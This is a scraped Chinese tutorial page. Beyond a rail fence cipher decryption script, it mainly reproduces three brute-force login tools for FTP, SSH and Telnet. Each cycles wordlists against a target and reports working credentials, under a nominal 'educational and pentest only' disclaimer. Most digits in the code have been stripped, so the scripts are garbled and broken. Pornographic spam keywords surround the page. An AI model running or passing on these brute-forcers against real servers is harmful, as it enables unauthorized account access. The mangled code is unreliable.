国产99久久精品_欧美日本韩国一区二区_激情小说综合网_欧美一级二级视频_午夜av电影_日本久久精品视频

最新文章專題視頻專題問答1問答10問答100問答1000問答2000關鍵字專題1關鍵字專題50關鍵字專題500關鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關鍵字專題關鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
當前位置: 首頁 - 科技 - 知識百科 - 正文

Python腳本暴力破解柵欄密碼

來源:懂視網 責編:小采 時間:2020-11-27 14:41:59
文檔

Python腳本暴力破解柵欄密碼

Python腳本暴力破解柵欄密碼:今天遇到一個要破解的柵欄密碼,先給大家介紹通用的腳本。 方法一(通用腳本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(請輸入要解密的字符串\n) elen = len(e) field=[] f
推薦度:
導讀Python腳本暴力破解柵欄密碼:今天遇到一個要破解的柵欄密碼,先給大家介紹通用的腳本。 方法一(通用腳本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(請輸入要解密的字符串\n) elen = len(e) field=[] f

今天遇到一個要破解的柵欄密碼,先給大家介紹通用的腳本。

方法一(通用腳本):

#!/usr/bin/env python
 # -*- coding: gbk -*-
 # -*- coding: utf_ -*-
 e = raw_input(‘請輸入要解密的字符串\n‘)
 elen = len(e)
 field=[]
 for i in range(,elen):
 if(elen%i==):
 field.append(i)
 for f in field:
 b = elen / f
 result = {x:‘‘ for x in range(b)}
 for i in range(elen):
 a = i % b;
 result.update({a:result[a] + e[i]})
 d = ‘‘
 for i in range(b):
 d = d + result[i]
 print ‘分為\t‘+str(f)+‘\t‘+‘欄時,解密
結果為: ‘+d

方法二:

FTP暴力破解腳本

#!/usr/bin/env python
#-*-coding = utf--*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@--
import sys, os, time
from ftplib import FTP
docs = """
 [*] This was written for educational purpose and pentest only. Use it at your own risk. 
 [*] Author will be not responsible for any damage!
 [*] Toolname : ftp_bf.py
 [*] Coder :
 [*] Version : .
 [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
 """
if sys.platform == 'linux' or sys.platform == 'linux':
 clearing = 'clear'
else:
 clearing = 'cls'
os.system(clearing)
R = "\[m";
G = "\[m";
Y = "\[m"
END = "\[m"
def logo():
 print G+"\n |---------------------------------------------------------------|"
 print " | |"
 print " | blog.sina.com.cn/kaiyongdeng |"
 print " | // ftp_bf.py v.. |"
 print " | FTP Brute Forcing Tool |"
 print " | |"
 print " |---------------------------------------------------------------|\n"
 print " \n [-] %s\n" % time.strftime("%X")
 print docs+END
def help():
 print R+"[*]-t, --target ip/hostname <> Our target"
 print "[*]-u, --usernamelist usernamelist <> usernamelist path"
 print "[*]-p, --passwordlist passwordlist <> passwordlist path"
 print "[*]-h, --help help <> print this help"
 print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit()
def bf_login(hostname,username,password):
 # sys.stdout.write("\r[!]Checking : %s " % (p))
 # sys.stdout.flush()
 try:
 ftp = FTP(hostname)
 ftp.login(hostname,username, password)
 ftp.retrlines('list')
 ftp.quit()
 print Y+"\n[!] wt,wt!!! We did it ! "
 print "[+] Target : ",hostname, ""
 print "[+] User : ",username, ""
 print "[+] Password : ",password, ""+END
 return 
 # sys.exit()
 except Exception, e:
 pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END
 sys.exit()
def anon_login(hostname):
 try:
 print G+"\n[!] Checking for anonymous login.\n"+END
 ftp = FTP(hostname) ftp.login()
 ftp.retrlines('LIST')
 print Y+"\n[!] wt,wt!!! Anonymous login successfuly !\n"+END
 ftp.quit()
 except Exception, e:
 print R+"\n[-] Anonymous login failed...\n"+END
 pass
def main():
 logo()
 try:
 for arg in sys.argv:
 if arg.lower() == '-t' or arg.lower() == '--target':
 hostname = sys.argv[int(sys.argv[:].index(arg))+]
 elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
 usernamelist = sys.argv[int(sys.argv[:].index(arg))+]
 elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
 passwordlist = sys.argv[int(sys.argv[:].index(arg))+]
 elif arg.lower() == '-h' or arg.lower() == '--help':
 help()
 elif len(sys.argv) <= :
 help()
 except:
 print R+"[-]Cheak your parametars input\n"+END
 help()
 print G+"[!] BruteForcing target ..."+END
 anon_login(hostname)
 # print "here is ok"
 # print hostname
 try:
 usernames = open(usernamelist, "r")
 user = usernames.readlines()
 count = 
 while count < len(user):
 user[count] = user[count].strip()
 count +=
 except:
 print R+"\n[-] Cheak your usernamelist path\n"+END
 sys.exit()
 # print "here is ok ",usernamelist,passwordlist
 try:
 passwords = open(passwordlist, "r")
 pwd = passwords.readlines()
 count = 
 while count < len(pwd):
 pwd[count] = pwd[count].strip()
 count +=
 except:
 print R+"\n[-] Check your passwordlist path\n"+END
 sys.exit()
 print G+"\n[+] Loaded:",len(user),"usernames"
 print "\n[+] Loaded:",len(pwd),"passwords"
 print "[+] Target:",hostname
 print "[+] Guessing...\n"+END
 for u in user: for p in pwd:
 result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
 if result != :
 print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
 else:
 print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
 if not result :
 print R+"\n[-]There is no username ans password enabled in the list."
 print "[-]Exiting...\n"+END
if __name__ == "__main__":
 main()

SSH暴力破解

#!/usr/bin/env python
#-*-coding = UTF--*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng
import sys
import os
import time
#from threading import Thread
try:
 from paramiko import SSHClient
 from paramiko import AutoAddPolicy
except ImportError:
 print G+'''
 You need paramiko module.
http://www.lag.net/paramiko/
 Debian/Ubuntu: sudo apt-get install aptitude
 : sudo aptitude install python-paramiko\n'''+END
 sys.exit()
docs = """
 [*] This was written for educational purpose and pentest only. Use it at your own risk.
 [*] Author will be not responsible for any damage! 
 [*] Toolname : ssh_bf.py
 [*] Author : xfk
 [*] Version : v..
 [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
 """
if sys.platform == 'linux' or sys.platform == 'linux':
 clearing = 'clear'
else: 
 clearing = 'cls'
os.system(clearing)
R = "\[m";
G = "\[m";
Y = "\[m"
END = "\[m"
def logo():
 print G+"\n |---------------------------------------------------------------|"
 print " | |"
 print " | blog.sina.com.cn/kaiyongdeng |"
 print " | // ssh_bf.py v.. |"
 print " | SSH Brute Forcing Tool |"
 print " | |"
 print " |---------------------------------------------------------------|\n"
 print " \n [-] %s\n" % time.ctime()
 print docs+END
def help():
 print Y+" [*]-H --hostname/ip <>the target hostname or ip address"
 print " [*]-P --port <>the ssh service port(default is )"
 print " [*]-U --usernamelist <>usernames list file"
 print " [*]-P --passwordlist <>passwords list file"
 print " [*]-H --help <>show help information"
 print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END
 sys.exit()
def BruteForce(hostname,port,username,password):
 '''
 Create SSH connection to target
 '''
 ssh = SSHClient()
 ssh.set_missing_host_key_policy(AutoAddPolicy())
 try:
 ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
 status = 'ok'
 ssh.close()
 except Exception, e:
 status = 'error'
 pass
 return status
def makelist(file):
 '''
 Make usernames and passwords lists
 '''
 items = []
 try:
 fd = open(file, 'r')
 except IOError:
 print R+'unable to read file \'%s\'' % file+END
 pass
 except Exception, e:
 print R+'unknown error'+END
 pass
 for line in fd.readlines():
 item = line.replace('\n', '').replace('\r', '')
 items.append(item)
 fd.close() 
 return items
def main():
 logo() 
# print "hello wold"
 try: 
 for arg in sys.argv:
 if arg.lower() == '-t' or arg.lower() == '--target':
 hostname = str(sys.argv[int(sys.argv[:].index(arg))+])
 if arg.lower() == '-p' or arg.lower() == '--port':
 port = sys.argv[int(sys.argv[:].index(arg))+]
 elif arg.lower() == '-u' or arg.lower() == '--userlist':
 userlist = sys.argv[int(sys.argv[:].index(arg))+]
 elif arg.lower() == '-w' or arg.lower() == '--wordlist':
 wordlist = sys.argv[int(sys.argv[:].index(arg))+]
 elif arg.lower() == '-h' or arg.lower() == '--help':
 help()
 elif len(sys.argv) <= :
 help()
 except:
 print R+"[-]Cheak your parametars input\n"+END
 help()
 print G+"\n[!] BruteForcing target ...\n"+END
# print "here is ok"
# print hostname,port,wordlist,userlist
 usernamelist = makelist(userlist)
 passwordlist = makelist(wordlist)
 print Y+"[*] SSH Brute Force Praparing."
 print "[*] %s user(s) loaded." % str(len(usernamelist))
 print "[*] %s password(s) loaded." % str(len(passwordlist))
 print "[*] Brute Force Is Starting......."+END
 try:
 for username in usernamelist:
 for password in passwordlist:
 print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END
 current = BruteForce(hostname, port, username, password)
 if current == 'error':
 print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END
# pass
 else:
 print G+"\n[+] ^-^ HaHa,We Got It!!!"
 print "[+] username: %s" % username
 print "[+] password: %s\n" % password+END
# sys.exit()
 except:
 print R+"\n[-] There Is Something Wrong,Pleace Cheak It."
 print "[-] Exitting.....\n"+END
 raise
 print Y+"[+] Done.^-^\n"+END
 sys.exit()
if __name__ == "__main__":
 main()

TELNET密碼暴力破解

#!usr/bin/python
#Telnet Brute Forcer
#http://www.darkcde.com
#dhydr[at]gmail[dot]com
import threading, time, random, sys, telnetlib
from copy import copy
if len(sys.argv) !=:
 print "Usage: ./telnetbrute.py  "
 sys.exit()
try:
 users = open(sys.argv[], "r").readlines()
except(IOError):
 print "Error: Check your userlist path\n"
 sys.exit()
try:
 words = open(sys.argv[], "r").readlines()
except(IOError):
 print "Error: Check your wordlist path\n"
 sys.exit()
print "\n\t dhydr[at]gmail[dot]com TelnetBruteForcer v."
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
 for word in wordlist:
 words.append(word)
def getword():
 lock = threading.Lock()
 lock.acquire()
 if len(words) != :
 value = random.sample(words, )
 words.remove(value[])
 else:
 print "\nReloading Wordlist - Changing User\n"
 reloader()
 value = random.sample(words, )
 users.remove(users[])
 lock.release()
 if len(users) ==:
 return value[][:-], users[]
 else:
 return value[][:-], users[][:-]
class Worker(threading.Thread):
 def run(self):
 value, user = getword()
 try:
 print "-"*
 print "User:",user,"Password:",value
 tn = telnetlib.Telnet(sys.argv[])
 tn.read_until("login: ")
 tn.write(user + "\n")
 if password:
 tn.read_until("Password: ")
 tn.write(value + "\n")
 tn.write("ls\n")
 tn.write("exit\n")
 print tn.read_all()
 print "\t\nLogin successful:",value, user
 tn.close()
 work.join()
 sys.exit()
 except:
 pass
for I in range(len(words)*len(users)):
 work = Worker()
 work.start()
 time.sleep()

聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

文檔

Python腳本暴力破解柵欄密碼

Python腳本暴力破解柵欄密碼:今天遇到一個要破解的柵欄密碼,先給大家介紹通用的腳本。 方法一(通用腳本): #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: utf_ -*- e = raw_input(請輸入要解密的字符串\n) elen = len(e) field=[] f
推薦度:
標簽: 密碼 破解 腳本
  • 熱門焦點

最新推薦

猜你喜歡

熱門推薦

專題
Top
主站蜘蛛池模板: 日韩视频在线观看 | 国产成人精品一区二区免费视频 | 国产免费观看网站 | 国产一区二区三区视频 | 欧美日韩另类综合 | 日韩在线视频免费 | 91精品国产91久久久久久最新 | 看国产一级毛片 | 国内精品99 | 欧美日韩一区二区三区在线播放 | 可以免费观看的毛片 | 国产成人麻豆精品video | 欧美色第一页 | 久久综合精品国产一区二区三区无 | 精品日韩欧美一区二区三区 | 三级中文字幕电影大全 | 视频一区二区三区欧美日韩 | 亚洲视频在线免费播放 | 欧美精品第1页在线播放 | 国产免费精彩视频 | 亚洲午夜一区二区三区 | 一道精品视频一区二区三区男同 | 欧美爱爱图 | 久久久青青久久国产精品 | 国产欧美精品区一区二区三区 | 囗交免费毛片 | 日韩欧美综合在线 | 欧美日韩国产精品va | 国产精品久久久久aaaa | 91久久国产综合精品 | 国内精品一区二区2021在线 | 欧美日韩国产在线 | 高清在线一区二区 | 亚洲97 | 国产啪视频 | 欧美日韩在线一区二区三区 | 国产一级淫片a免费播放口 国产一级特黄a大片99 | 亚洲欧美日韩中文字幕在线 | 午夜精品视频 | 欧美综合亚洲图片综合区 | 精品国产一区二区三区久久影院 |